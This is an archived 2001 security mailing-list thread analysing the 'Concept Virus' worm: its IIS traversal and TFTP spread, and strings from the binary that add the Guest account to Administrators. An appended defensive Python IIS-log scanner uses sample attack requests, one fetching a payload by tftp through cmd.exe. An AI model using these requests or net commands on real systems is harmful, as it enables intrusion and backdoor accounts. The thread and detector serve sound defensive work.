RE: Concept Virus(CV) V.5 - Advisory and Quick analysis

From: Robert Nieuwhof (RNieuwhofat_private)
Date: Tue Sep 18 2001 - 14:00:36 PDT


    Have you indeed confirmed that the worm utilizes port 69? If so, how was
    this confirmed and will you please share the criteria and results of your
    confirmational testing?
    
    Thanks,
    Robert J. Nieuwhof, CNA, MCP
    mailto:Rnieuwhofat_private
    Network Engineer
    NOS Communications - Information Services
    
    http://www.nos.com
    
    Madness takes its toll. Please have exact change. 
    
    The information contained in this correspondence is confidential and
    intended for the use of the individual or entity named above. Unauthorized
    distribution is prohibited. Any and all opinions expressed,  are the
    opinions of the author of this e-mail, and in no way reflect or imply the
    opinions of NOS Communications.
    
    
    -----Original Message-----
    From: Dave Sill [mailto:davidsat_private]
    Sent: Tuesday, September 18, 2001 11:13 AM
    To: Grady Fox
    Cc: incidentsat_private
    Subject: Re: Concept Virus(CV) V.5 - Advisory and Quick analysis
    
    
    We've blocked 69/udp at our internal and border routers both incoming and
    outgoing.  Be careful with your private networks.  Our tech support
    department contracted this bug by opening a web page of an infected customer
    in response to a complaint about performance.
    
    Dave Sill
    Server Admin
    Socket Internet Services
    davidsat_private
    
    On Tuesday 18 September 2001 15:10, you wrote:
    > YES
    >
    > --- Dave Sill <davidsat_private> wrote:
    > > You say that the worm gets a payload by tftp...  Is
    > > it using port 69?
    > >
    > > Thanks,
    > >
    > > Dave Sill
    > > Server Admin
    > > Socket Internet Services
    > > davidsat_private
    > >
    > > Is the worm
    > >
    > > On Tuesday 18 September 2001 10:47, you wrote:
    > > > Hi all!
    > > >
    > > >
    > > > We've all just been hit by a VERY aggressive worm/virus.
    > > > Quick analysis indicates that it propagates itself in
    > > > a number of different ways:
    > > >
    > > > Through use of IIS UNICODE directory traversal coupled
    > > > with the recent IIS .dll privilege escalation attack.
    > > > It uses SMB/CIFS and TFTP to get the worm payload.
    > > >
    > > > Through MAPI mails (probably to all of addressbook).
    > > >
    > > > Other ways of spreading may be possible, but we haven't
    > > > yet had the time to properly analyse the worm/virus.
    > > >
    > > > It seems to share "c:\" via SMB/CIFS as "c$" and
    > > > the worm/virus also adds the "Guest" user and "Guests"
    > > > group to the local "Administrators" group....
    > > >
    > > >
    > > > Interesting strings in binary:
    > > >
    > > > Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
    > > > SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
    > > > share c$=c:\
    > > > user guest ""
    > > > localgroup Administrators guest /add
    > > > localgroup Guests guest /add
    > > > user guest /active
    > > > open
    > > > user guest /add
    > > > net
    > > >
    > > >
    > > > More info as we come upon it.....
    > > >
    > > > /olle
    >
    >
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
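Given the propagation path olle describes (IIS Unicode directory traversal into cmd.exe, then a TFTP fetch of the payload), a defender's first check is the IIS web log. The following is an added example, not code from any poster in the thread: it normalizes percent-encoded request paths (including double-encoding and the overlong %c0%af / %c1%9c separators) and flags lines showing traversal, cmd.exe, or tftp. The log lines and addresses are constructed sample data.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C-style log lines (sample data, not from the thread).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-09-18 17:05:11 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.7+GET+payload.dll 200
2001-09-18 17:05:12 10.0.0.7 GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 17:06:40 10.0.0.9 GET /index.html - 200
2001-09-18 17:07:02 10.0.0.9 GET /msadc/..%c1%9c../winnt/system32/cmd.exe /c+dir 404
"""

# "../" or "..\" anywhere in the decoded path
TRAVERSAL = re.compile(r"\.\.[\\/]")


def normalize_uri(uri: str) -> str:
    """Decode a request path the way a permissive server would: two rounds of
    percent-decoding (so %255c -> %5c -> '\\' is caught) plus the overlong
    UTF-8 forms of '/' and '\\' (%c0%af, %c1%9c) that the IIS Unicode bug accepted."""
    raw = unquote_to_bytes(uri)
    raw = unquote_to_bytes(raw)
    raw = raw.replace(b"\xc0\xaf", b"/").replace(b"\xc1\x9c", b"\\")
    return raw.decode("latin-1")


def classify(line: str):
    """Return a finding dict for a suspicious log line, or None if it looks benign."""
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, client_ip, _method, stem, query, status = parts[:7]
    path = normalize_uri(stem).lower()
    args = normalize_uri(query).lower()
    reasons = []
    if TRAVERSAL.search(path):
        reasons.append("encoded directory traversal")
    if "cmd.exe" in path:
        reasons.append("cmd.exe reached through the web server")
    if "tftp" in args:
        reasons.append("tftp in query string (payload fetch)")
    if not reasons:
        return None
    # A 404 still records an attempt worth investigating, so status is reported, not filtered.
    return {"ip": client_ip, "status": status, "reasons": reasons}


def scan(log_text: str):
    """Run classify over every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]
```

Pair this with the network-side control Dave mentions (blocking 69/udp): a host that shows the tftp request here and then opens an outbound TFTP connection has very likely fetched the payload.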
    
    
    
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 17:00:23 PDT